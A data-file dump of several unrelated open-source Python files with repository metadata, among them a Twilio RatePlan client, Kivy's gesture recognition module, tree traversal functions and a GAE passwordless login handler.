code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from gaecookie.decorator import no_csrf
from gaepermission import facade
from gaepermission.decorator import login_not_required
from tekton import router
@no_csrf
@login_not_required
def index(_write_tmpl):
_write_tmpl('login/passwordless_info.html')
@login_not_required
def enviar_email(_handler, email, ret_path='/'):
url = 'https://livrogae.appspot.com' + router.to_path(checar, ret_path=ret_path)
facade.send_passwordless_login_link(email, url, 'pt_BR').execute()
_handler.redirect(router.to_path(index))
@no_csrf
@login_not_required
def checar(_handler, _resp, ticket, ret_path='/'):
facade.login_passwordless(ticket, _resp).execute()
_handler.redirect(ret_path)
@no_csrf
def form(_write_tmpl):
app = facade.get_passwordless_app_data().execute().result
dct = {'salvar_app_path': router.to_path(salvar), 'app': app}
_write_tmpl('login/passwordless_form.html', dct)
def salvar(_handler, app_id, token):
facade.save_or_update_passwordless_app_data(app_id, token).execute()
_handler.redirect('/')
|
renzon/livrogae
|
backend/src/web/login/passwordless.py
|
Python
|
mit
| 1,132
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import serialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class RatePlanList(ListResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version):
"""
Initialize the RatePlanList
:param Version version: Version that contains the resource
:returns: twilio.rest.preview.wireless.rate_plan.RatePlanList
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanList
"""
super(RatePlanList, self).__init__(version)
# Path Solution
self._solution = {}
self._uri = '/RatePlans'.format(**self._solution)
def stream(self, limit=None, page_size=None):
"""
Streams RatePlanInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.preview.wireless.rate_plan.RatePlanInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(page_size=limits['page_size'], )
return self._version.stream(page, limits['limit'])
def list(self, limit=None, page_size=None):
"""
Lists RatePlanInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.preview.wireless.rate_plan.RatePlanInstance]
"""
return list(self.stream(limit=limit, page_size=page_size, ))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of RatePlanInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanPage
"""
data = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })
response = self._version.page(method='GET', uri=self._uri, params=data, )
return RatePlanPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of RatePlanInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return RatePlanPage(self._version, response, self._solution)
def create(self, unique_name=values.unset, friendly_name=values.unset,
data_enabled=values.unset, data_limit=values.unset,
data_metering=values.unset, messaging_enabled=values.unset,
voice_enabled=values.unset, commands_enabled=values.unset,
national_roaming_enabled=values.unset,
international_roaming=values.unset):
"""
Create the RatePlanInstance
:param unicode unique_name: The unique_name
:param unicode friendly_name: The friendly_name
:param bool data_enabled: The data_enabled
:param unicode data_limit: The data_limit
:param unicode data_metering: The data_metering
:param bool messaging_enabled: The messaging_enabled
:param bool voice_enabled: The voice_enabled
:param bool commands_enabled: The commands_enabled
:param bool national_roaming_enabled: The national_roaming_enabled
:param list[unicode] international_roaming: The international_roaming
:returns: The created RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
"""
data = values.of({
'UniqueName': unique_name,
'FriendlyName': friendly_name,
'DataEnabled': data_enabled,
'DataLimit': data_limit,
'DataMetering': data_metering,
'MessagingEnabled': messaging_enabled,
'VoiceEnabled': voice_enabled,
'CommandsEnabled': commands_enabled,
'NationalRoamingEnabled': national_roaming_enabled,
'InternationalRoaming': serialize.map(international_roaming, lambda e: e),
})
payload = self._version.create(method='POST', uri=self._uri, data=data, )
return RatePlanInstance(self._version, payload, )
def get(self, sid):
"""
Constructs a RatePlanContext
:param sid: The sid
:returns: twilio.rest.preview.wireless.rate_plan.RatePlanContext
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanContext
"""
return RatePlanContext(self._version, sid=sid, )
def __call__(self, sid):
"""
Constructs a RatePlanContext
:param sid: The sid
:returns: twilio.rest.preview.wireless.rate_plan.RatePlanContext
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanContext
"""
return RatePlanContext(self._version, sid=sid, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.Wireless.RatePlanList>'
class RatePlanPage(Page):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, response, solution):
"""
Initialize the RatePlanPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:returns: twilio.rest.preview.wireless.rate_plan.RatePlanPage
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanPage
"""
super(RatePlanPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of RatePlanInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
"""
return RatePlanInstance(self._version, payload, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.Wireless.RatePlanPage>'
class RatePlanContext(InstanceContext):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, sid):
"""
Initialize the RatePlanContext
:param Version version: Version that contains the resource
:param sid: The sid
:returns: twilio.rest.preview.wireless.rate_plan.RatePlanContext
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanContext
"""
super(RatePlanContext, self).__init__(version)
# Path Solution
self._solution = {'sid': sid, }
self._uri = '/RatePlans/{sid}'.format(**self._solution)
def fetch(self):
"""
Fetch the RatePlanInstance
:returns: The fetched RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
"""
payload = self._version.fetch(method='GET', uri=self._uri, )
return RatePlanInstance(self._version, payload, sid=self._solution['sid'], )
def update(self, unique_name=values.unset, friendly_name=values.unset):
"""
Update the RatePlanInstance
:param unicode unique_name: The unique_name
:param unicode friendly_name: The friendly_name
:returns: The updated RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
"""
data = values.of({'UniqueName': unique_name, 'FriendlyName': friendly_name, })
payload = self._version.update(method='POST', uri=self._uri, data=data, )
return RatePlanInstance(self._version, payload, sid=self._solution['sid'], )
def delete(self):
"""
Deletes the RatePlanInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._version.delete(method='DELETE', uri=self._uri, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.Wireless.RatePlanContext {}>'.format(context)
class RatePlanInstance(InstanceResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, payload, sid=None):
"""
Initialize the RatePlanInstance
:returns: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
"""
super(RatePlanInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'sid': payload.get('sid'),
'unique_name': payload.get('unique_name'),
'account_sid': payload.get('account_sid'),
'friendly_name': payload.get('friendly_name'),
'data_enabled': payload.get('data_enabled'),
'data_metering': payload.get('data_metering'),
'data_limit': deserialize.integer(payload.get('data_limit')),
'messaging_enabled': payload.get('messaging_enabled'),
'voice_enabled': payload.get('voice_enabled'),
'national_roaming_enabled': payload.get('national_roaming_enabled'),
'international_roaming': payload.get('international_roaming'),
'date_created': deserialize.iso8601_datetime(payload.get('date_created')),
'date_updated': deserialize.iso8601_datetime(payload.get('date_updated')),
'url': payload.get('url'),
}
# Context
self._context = None
self._solution = {'sid': sid or self._properties['sid'], }
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: RatePlanContext for this RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanContext
"""
if self._context is None:
self._context = RatePlanContext(self._version, sid=self._solution['sid'], )
return self._context
@property
def sid(self):
"""
:returns: The sid
:rtype: unicode
"""
return self._properties['sid']
@property
def unique_name(self):
"""
:returns: The unique_name
:rtype: unicode
"""
return self._properties['unique_name']
@property
def account_sid(self):
"""
:returns: The account_sid
:rtype: unicode
"""
return self._properties['account_sid']
@property
def friendly_name(self):
"""
:returns: The friendly_name
:rtype: unicode
"""
return self._properties['friendly_name']
@property
def data_enabled(self):
"""
:returns: The data_enabled
:rtype: bool
"""
return self._properties['data_enabled']
@property
def data_metering(self):
"""
:returns: The data_metering
:rtype: unicode
"""
return self._properties['data_metering']
@property
def data_limit(self):
"""
:returns: The data_limit
:rtype: unicode
"""
return self._properties['data_limit']
@property
def messaging_enabled(self):
"""
:returns: The messaging_enabled
:rtype: bool
"""
return self._properties['messaging_enabled']
@property
def voice_enabled(self):
"""
:returns: The voice_enabled
:rtype: bool
"""
return self._properties['voice_enabled']
@property
def national_roaming_enabled(self):
"""
:returns: The national_roaming_enabled
:rtype: bool
"""
return self._properties['national_roaming_enabled']
@property
def international_roaming(self):
"""
:returns: The international_roaming
:rtype: list[unicode]
"""
return self._properties['international_roaming']
@property
def date_created(self):
"""
:returns: The date_created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The date_updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def url(self):
"""
:returns: The url
:rtype: unicode
"""
return self._properties['url']
def fetch(self):
"""
Fetch the RatePlanInstance
:returns: The fetched RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
"""
return self._proxy.fetch()
def update(self, unique_name=values.unset, friendly_name=values.unset):
"""
Update the RatePlanInstance
:param unicode unique_name: The unique_name
:param unicode friendly_name: The friendly_name
:returns: The updated RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
"""
return self._proxy.update(unique_name=unique_name, friendly_name=friendly_name, )
def delete(self):
"""
Deletes the RatePlanInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._proxy.delete()
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.Wireless.RatePlanInstance {}>'.format(context)
|
twilio/twilio-python
|
twilio/rest/preview/wireless/rate_plan.py
|
Python
|
mit
| 16,909
|
"""
This library implements a simple set of parallel processing utilities that
take advantage of python's `multiprocessing` module to distribute processing
over multiple CPUs on a single machine. The most salient feature of this
library is the `map()` function that can be used to distribute CPU-intensive
processing of a collection of items over multiple cores.
"""
from .map import map
from .about import (__name__, __version__, __author__, __author_email__,
__description__, __license__, __url__)
__all__ = [map,
__name__, __version__, __author__, __author_email__,
__description__, __license__, __url__]
|
halfak/python-para
|
para/__init__.py
|
Python
|
mit
| 652
|
from setuptools import setup
setup(
name='pandas_redshift',
packages=['pandas_redshift'],
version='2.0.5',
description='Load data from redshift into a pandas DataFrame and vice versa.',
author='Aidan Gawronski',
author_email='aidangawronski@gmail.com',
# url = 'https://github.com/agawronski/pandas_redshift',
python_requires='>=3',
install_requires=['psycopg2-binary',
'pandas',
'boto3'],
include_package_data=True
)
|
agawronski/pandas_redshift
|
setup.py
|
Python
|
mit
| 503
|
print "hahahahahaah!"
print "hahahahahaah!"
print "hahahahahaah!"
print "hahahahahaah!"
print "hahahahahaah!"
print "hahahahahaah!"
print "hahahahahaah!"
print "hahahahahaah!"
print "hahahahahaah!"
|
SuperJerry/Swift
|
python/test.py
|
Python
|
mit
| 199
|
import numpy as np
import time
import datetime
SIMULATED_TIME_MAIN = 60 * 60 * 24 * 10
SIMULATED_TIME_FORECAST = 60 * 60 * 24 * 100
def plot_dataset(sensordata,forecast_start=0,block=True):
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
forecast_plot, = ax.plot(range(forecast_start,len(sensordata["forecasted"])+forecast_start), sensordata["forecasted"], label="forecasted")
sim_plot, = ax.plot(range(len(sensordata["measured"])), sensordata["measured"], label="measured")
# Now add the legend with some customizations.
legend = ax.legend(loc='upper center', shadow=True)
# The frame is matplotlib.patches.Rectangle instance surrounding the legend.
frame = legend.get_frame()
frame.set_facecolor('0.90')
# Set the fontsize
for label in legend.get_texts():
label.set_fontsize('medium')
for label in legend.get_lines():
label.set_linewidth(1.5)
plt.subplots_adjust(bottom=0.2)
plt.xlabel('Simulated time in seconds')
plt.xticks(rotation=90)
plt.grid(True)
plt.show()
def show_plotting(plt, ax, block):
#import matplotlib.pyplot as plt
# Now add the legend with some customizations.
legend = ax.legend(loc='upper center', shadow=True,prop={'size':18})
# The frame is matplotlib.patches.Rectangle instance surrounding the legend.
frame = legend.get_frame()
frame.set_facecolor('0.90')
# Set the fontsize
for label in legend.get_texts():
label.set_fontsize('large')
for label in legend.get_lines():
label.set_linewidth(5.5)
plt.subplots_adjust(bottom=0.2)
#plt.xlabel('Simulated time in seconds')
#plt.xticks(rotation=90)
plt.tick_params(axis='both', which='major', labelsize=16)
plt.tick_params(axis='both', which='minor', labelsize=14)
plt.grid(True)
plt.show(block)
class Plotting(object):
def __init__(self):
self.measure_values = [
'time', 'cu_workload', 'plb_workload', 'hs_temperature',
'thermal_consumption', 'outside_temperature', 'electrical_consumption']
# self.simulation_manager = SimulationManager(
# initial_time=1396915200) # 8.4.2014
self.plot_new_simulation(SIMULATED_TIME_FORECAST, 60, "Forecast1")
def plot_new_simulation(self, simulated_time, title, datasheet=None):
import matplotlib.pyplot as plt
data = {}
for name in self.measure_values:
data[name] = []
(simulation, measurements) = self.simulation_manager.forecast_for(
simulated_time, blocking=False)
env = simulation.env
rule_strategy = RuleStrategy(env, self.simulation_manager)
# supply environment with measurement function
env.register_step_function(self.step_function, {
"env": env, "measurement_cache": measurements, "data": data, "rule_strategy": rule_strategy})
while env.forward > 0:
time.sleep(0.2)
t = []
for value in data["time"]:
t.append(datetime.datetime.fromtimestamp(value))
Plotting.plot_dataset(t, data, "Energy Conversion")
plt.show(block=True)
def step_function(self, kwargs):
self.measure_function(kwargs)
if "rule_strategy" in kwargs:
rule_strategy = kwargs["rule_strategy"]
rule_strategy.step_function()
def measure_function(self, kwargs):
env = kwargs["env"]
if env.now % 3600 == 0.0:
measurements = kwargs["measurement_cache"]
data = kwargs["data"]
for value in self.measure_values:
data[value].append(measurements.get_mapped_value(value))
if __name__ == "__main__":
Plotting()
|
SEC-i/ecoControl
|
server/forecasting/tools/plotting.py
|
Python
|
mit
| 3,818
|
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
def preorder(bt):
"A preorder traversal of a binary tree"
children = [bt]
while children:
n = children.pop()
if n.right:
children.append(n.right)
if n.left:
children.append(n.left)
yield n.val
def inorder(bst):
"An inorder traversal of a binary tree"
parents = []
def traverse_left(n):
while n is not None:
parents.append(n)
n = n.left
traverse_left(bst)
while parents:
bst = parents.pop()
yield bst.val
traverse_left(bst.right)
def postorder(root):
# if root.left:
# for n in postorder(root.left):
# yield n
# if root.right:
# for n in postorder(root.right):
# yield n
# yield root.val
# prev = None
# s = [root]
# while s:
# c = s[-1]
# going down
# if not prev or prev.left is c or prev.right is c:
# if c.left:
# s.append(c.left)
# elif c.right:
# s.append(c.right)
# else:
# yield c.val
# s.pop()
# traversing up from left
# elif c.left is prev:
# if c.right:
# s.append(c.right)
# else:
# yield c.val
# s.pop()
# traversing up from right
# elif c.right is prev:
# yield c.val
# s.pop()
# prev = c
s = []
prev = None
current = root
while s or current:
if current:
s.append(current)
current = current.left
else:
p = s[-1]
if p.right and prev is not p.right:
current = p.right
else:
yield p.val
prev = s.pop()
if __name__ == '__main__':
# http://en.wikipedia.org/wiki/Tree_traversal
f = TreeNode("F")
f.left = TreeNode("B")
f.right = TreeNode("G")
f.left.left = TreeNode("A")
f.left.right = TreeNode("D")
f.left.right.left = TreeNode("C")
f.left.right.right = TreeNode("E")
f.right.right = TreeNode("I")
f.right.right.left = TreeNode("H")
assert list(preorder(f)) == ['F', 'B', 'A', 'D', 'C', 'E', 'G', 'I', 'H']
assert list(inorder(f)) == ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I']
assert list(postorder(f)) == ['A', 'C', 'E', 'D', 'B', 'H', 'I', 'G', 'F']
|
calebperkins/algorithms
|
algorithms/trees.py
|
Python
|
mit
| 2,540
|
'''
Gesture recognition
===================
This class allows you to easily create new
gestures and compare them::
from kivy.gesture import Gesture, GestureDatabase
# Create a gesture
g = Gesture()
g.add_stroke(point_list=[(1,1), (3,4), (2,1)])
g.normalize()
# Add it to the database
gdb = GestureDatabase()
gdb.add_gesture(g)
# And for the next gesture, try to find it!
g2 = Gesture()
# ...
gdb.find(g2)
.. warning::
You don't really want to do this: it's more of an example of how
to construct gestures dynamically. Typically, you would
need a lot more points, so it's better to record gestures in a file and
reload them to compare later. Look in the examples/gestures directory for
an example of how to do that.
'''
__all__ = ('Gesture', 'GestureDatabase', 'GesturePoint', 'GestureStroke')
import pickle
import base64
import zlib
import math
from kivy.compat import PY2
from kivy.vector import Vector
# XXX we can't use io.StringIO in PY2 cause it require unicode
# PY2 / StringIO ( str or unicode )
# PY2 / cStringIO ( str )
# PY3 / io.StringIO ( unicode )
if PY2:
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
else:
from io import StringIO
class GestureDatabase(object):
'''Class to handle a gesture database.'''
def __init__(self):
self.db = []
def add_gesture(self, gesture):
'''Add a new gesture to the database.'''
self.db.append(gesture)
def find(self, gesture, minscore=0.9, rotation_invariant=True):
'''Find a matching gesture in the database.'''
if not gesture:
return
best = None
bestscore = minscore
for g in self.db:
score = g.get_score(gesture, rotation_invariant)
if score < bestscore:
continue
bestscore = score
best = g
if not best:
return
return (bestscore, best)
def gesture_to_str(self, gesture):
'''Convert a gesture into a unique string.'''
io = StringIO()
p = pickle.Pickler(io)
p.dump(gesture)
data = base64.b64encode(zlib.compress(io.getvalue(), 9))
return data
def str_to_gesture(self, data):
'''Convert a unique string to a gesture.'''
io = StringIO(zlib.decompress(base64.b64decode(data)))
p = pickle.Unpickler(io)
gesture = p.load()
return gesture
class GesturePoint:
def __init__(self, x, y):
'''Stores the x,y coordinates of a point in the gesture.'''
self.x = float(x)
self.y = float(y)
def scale(self, factor):
''' Scales the point by the given factor.'''
self.x *= factor
self.y *= factor
return self
def __repr__(self):
return 'Mouse_point: %f,%f' % (self.x, self.y)
class GestureStroke:
''' Gestures can be made up of multiple strokes.'''
def __init__(self):
''' A stroke in the gesture.'''
self.points = list()
self.screenpoints = list()
# These return the min and max coordinates of the stroke
@property
def max_x(self):
if len(self.points) == 0:
return 0
return max(self.points, key=lambda pt: pt.x).x
@property
def min_x(self):
if len(self.points) == 0:
return 0
return min(self.points, key=lambda pt: pt.x).x
@property
def max_y(self):
if len(self.points) == 0:
return 0
return max(self.points, key=lambda pt: pt.y).y
@property
def min_y(self):
if len(self.points) == 0:
return 0
return min(self.points, key=lambda pt: pt.y).y
def add_point(self, x, y):
'''
add_point(x=x_pos, y=y_pos)
Adds a point to the stroke.
'''
self.points.append(GesturePoint(x, y))
self.screenpoints.append((x, y))
def scale_stroke(self, scale_factor):
'''
scale_stroke(scale_factor=float)
Scales the stroke down by scale_factor.
'''
self.points = [pt.scale(scale_factor) for pt in self.points]
def points_distance(self, point1, point2):
'''
points_distance(point1=GesturePoint, point2=GesturePoint)
Returns the distance between two GesturePoints.
'''
x = point1.x - point2.x
y = point1.y - point2.y
return math.sqrt(x * x + y * y)
def stroke_length(self, point_list=None):
'''Finds the length of the stroke. If a point list is given,
finds the length of that list.
'''
if point_list is None:
point_list = self.points
gesture_length = 0.0
if len(point_list) <= 1: # If there is only one point -> no length
return gesture_length
for i in range(len(point_list) - 1):
gesture_length += self.points_distance(
point_list[i], point_list[i + 1])
return gesture_length
def normalize_stroke(self, sample_points=32):
'''Normalizes strokes so that every stroke has a standard number of
points. Returns True if stroke is normalized, False if it can't be
normalized. sample_points controls the resolution of the stroke.
'''
# If there is only one point or the length is 0, don't normalize
if len(self.points) <= 1 or self.stroke_length(self.points) == 0.0:
return False
# Calculate how long each point should be in the stroke
target_stroke_size = \
self.stroke_length(self.points) / float(sample_points)
new_points = list()
new_points.append(self.points[0])
# We loop on the points
prev = self.points[0]
src_distance = 0.0
dst_distance = target_stroke_size
for curr in self.points[1:]:
d = self.points_distance(prev, curr)
if d > 0:
prev = curr
src_distance = src_distance + d
# The new point need to be inserted into the
# segment [prev, curr]
while dst_distance < src_distance:
x_dir = curr.x - prev.x
y_dir = curr.y - prev.y
ratio = (src_distance - dst_distance) / d
to_x = x_dir * ratio + prev.x
to_y = y_dir * ratio + prev.y
new_points.append(GesturePoint(to_x, to_y))
dst_distance = self.stroke_length(self.points) / \
float(sample_points) * len(new_points)
# If this happens, we are into troubles...
if not len(new_points) == sample_points:
raise ValueError('Invalid number of strokes points; got '
'%d while it should be %d' %
(len(new_points), sample_points))
self.points = new_points
return True
def center_stroke(self, offset_x, offset_y):
'''Centers the stroke by offseting the points.'''
for point in self.points:
point.x -= offset_x
point.y -= offset_y
class Gesture:
'''A python implementation of a gesture recognition algorithm by
Oleg Dopertchouk: http://www.gamedev.net/reference/articles/article2039.asp
Implemented by Jeiel Aranal (chemikhazi@gmail.com),
released into the public domain.
'''
# Tolerance for evaluation using the '==' operator
DEFAULT_TOLERANCE = 0.1
def __init__(self, tolerance=None):
'''
Gesture([tolerance=float])
Creates a new gesture with an optional matching tolerance value.
'''
self.width = 0.
self.height = 0.
self.gesture_product = 0.
self.strokes = list()
if tolerance is None:
self.tolerance = Gesture.DEFAULT_TOLERANCE
else:
self.tolerance = tolerance
def _scale_gesture(self):
''' Scales down the gesture to a unit of 1.'''
# map() creates a list of min/max coordinates of the strokes
# in the gesture and min()/max() pulls the lowest/highest value
min_x = min([stroke.min_x for stroke in self.strokes])
max_x = max([stroke.max_x for stroke in self.strokes])
min_y = min([stroke.min_y for stroke in self.strokes])
max_y = max([stroke.max_y for stroke in self.strokes])
x_len = max_x - min_x
self.width = x_len
y_len = max_y - min_y
self.height = y_len
scale_factor = max(x_len, y_len)
if scale_factor <= 0.0:
return False
scale_factor = 1.0 / scale_factor
for stroke in self.strokes:
stroke.scale_stroke(scale_factor)
return True
def _center_gesture(self):
''' Centers the Gesture.points of the gesture.'''
total_x = 0.0
total_y = 0.0
total_points = 0
for stroke in self.strokes:
# adds up all the points inside the stroke
stroke_y = sum([pt.y for pt in stroke.points])
stroke_x = sum([pt.x for pt in stroke.points])
total_y += stroke_y
total_x += stroke_x
total_points += len(stroke.points)
if total_points == 0:
return False
# Average to get the offset
total_x /= total_points
total_y /= total_points
# Apply the offset to the strokes
for stroke in self.strokes:
stroke.center_stroke(total_x, total_y)
return True
def add_stroke(self, point_list=None):
'''Adds a stroke to the gesture and returns the Stroke instance.
Optional point_list argument is a list of the mouse points for
the stroke.
'''
self.strokes.append(GestureStroke())
if isinstance(point_list, list) or isinstance(point_list, tuple):
for point in point_list:
if isinstance(point, GesturePoint):
self.strokes[-1].points.append(point)
elif isinstance(point, list) or isinstance(point, tuple):
if len(point) != 2:
raise ValueError("Stroke entry must have 2 values max")
self.strokes[-1].add_point(point[0], point[1])
else:
raise TypeError("The point list should either be "
"tuples of x and y or a list of "
"GesturePoint objects")
elif point_list is not None:
raise ValueError("point_list should be a tuple/list")
return self.strokes[-1]
def normalize(self, stroke_samples=32):
'''Runs the gesture normalization algorithm and calculates the dot
product with self.
'''
if not self._scale_gesture() or not self._center_gesture():
self.gesture_product = False
return False
for stroke in self.strokes:
stroke.normalize_stroke(stroke_samples)
self.gesture_product = self.dot_product(self)
def get_rigid_rotation(self, dstpts):
'''
Extract the rotation to apply to a group of points to minimize the
distance to a second group of points. The two groups of points are
assumed to be centered. This is a simple version that just picks
an angle based on the first point of the gesture.
'''
if len(self.strokes) < 1 or len(self.strokes[0].points) < 1:
return 0
if len(dstpts.strokes) < 1 or len(dstpts.strokes[0].points) < 1:
return 0
p = dstpts.strokes[0].points[0]
target = Vector([p.x, p.y])
source = Vector([p.x, p.y])
return source.angle(target)
def dot_product(self, comparison_gesture):
''' Calculates the dot product of the gesture with another gesture.'''
if len(comparison_gesture.strokes) != len(self.strokes):
return -1
if getattr(comparison_gesture, 'gesture_product', True) is False or \
getattr(self, 'gesture_product', True) is False:
return -1
dot_product = 0.0
for stroke_index, (my_stroke, cmp_stroke) in enumerate(
list(zip(self.strokes, comparison_gesture.strokes))):
for pt_index, (my_point, cmp_point) in enumerate(
list(zip(my_stroke.points, cmp_stroke.points))):
dot_product += (my_point.x * cmp_point.x +
my_point.y * cmp_point.y)
return dot_product
def rotate(self, angle):
g = Gesture()
for stroke in self.strokes:
tmp = []
for j in stroke.points:
v = Vector([j.x, j.y]).rotate(angle)
tmp.append(v)
g.add_stroke(tmp)
g.gesture_product = g.dot_product(g)
return g
def get_score(self, comparison_gesture, rotation_invariant=True):
''' Returns the matching score of the gesture against another gesture.
'''
if isinstance(comparison_gesture, Gesture):
if rotation_invariant:
# get orientation
angle = self.get_rigid_rotation(comparison_gesture)
# rotate the gesture to be in the same frame.
comparison_gesture = comparison_gesture.rotate(angle)
# this is the normal "orientation" code.
score = self.dot_product(comparison_gesture)
if score <= 0:
return score
score /= math.sqrt(
self.gesture_product * comparison_gesture.gesture_product)
return score
def __eq__(self, comparison_gesture):
''' Allows easy comparisons between gesture instances.'''
if isinstance(comparison_gesture, Gesture):
# If the gestures don't have the same number of strokes, its
# definitely not the same gesture
score = self.get_score(comparison_gesture)
if (score > (1.0 - self.tolerance) and
score < (1.0 + self.tolerance)):
return True
else:
return False
else:
return NotImplemented
def __ne__(self, comparison_gesture):
result = self.__eq__(comparison_gesture)
if result is NotImplemented:
return result
else:
return not result
def __lt__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with <")
def __gt__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with >")
def __le__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with <=")
def __ge__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with >=")
|
Davideddu/kivy-forkedtouch
|
kivy/gesture.py
|
Python
|
mit
| 14,948
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._models_py3 import AzureResourceBase
from ._models_py3 import ErrorAdditionalInfo
from ._models_py3 import ErrorResponse
from ._models_py3 import SystemData
from ._models_py3 import TemplateSpec
from ._models_py3 import TemplateSpecArtifact
from ._models_py3 import TemplateSpecTemplateArtifact
from ._models_py3 import TemplateSpecUpdateModel
from ._models_py3 import TemplateSpecVersion
from ._models_py3 import TemplateSpecVersionInfo
from ._models_py3 import TemplateSpecVersionUpdateModel
from ._models_py3 import TemplateSpecVersionsListResult
from ._models_py3 import TemplateSpecsError
from ._models_py3 import TemplateSpecsListResult
from ._template_specs_client_enums import (
CreatedByType,
TemplateSpecArtifactKind,
TemplateSpecExpandKind,
)
__all__ = [
'AzureResourceBase',
'ErrorAdditionalInfo',
'ErrorResponse',
'SystemData',
'TemplateSpec',
'TemplateSpecArtifact',
'TemplateSpecTemplateArtifact',
'TemplateSpecUpdateModel',
'TemplateSpecVersion',
'TemplateSpecVersionInfo',
'TemplateSpecVersionUpdateModel',
'TemplateSpecVersionsListResult',
'TemplateSpecsError',
'TemplateSpecsListResult',
'CreatedByType',
'TemplateSpecArtifactKind',
'TemplateSpecExpandKind',
]
|
Azure/azure-sdk-for-python
|
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/templatespecs/v2019_06_01_preview/models/__init__.py
|
Python
|
mit
| 1,737
|
from users_push.userposter import send_message
class UserHostess:
def greet_user(self, user_id):
send_message("Hey !", user_id)
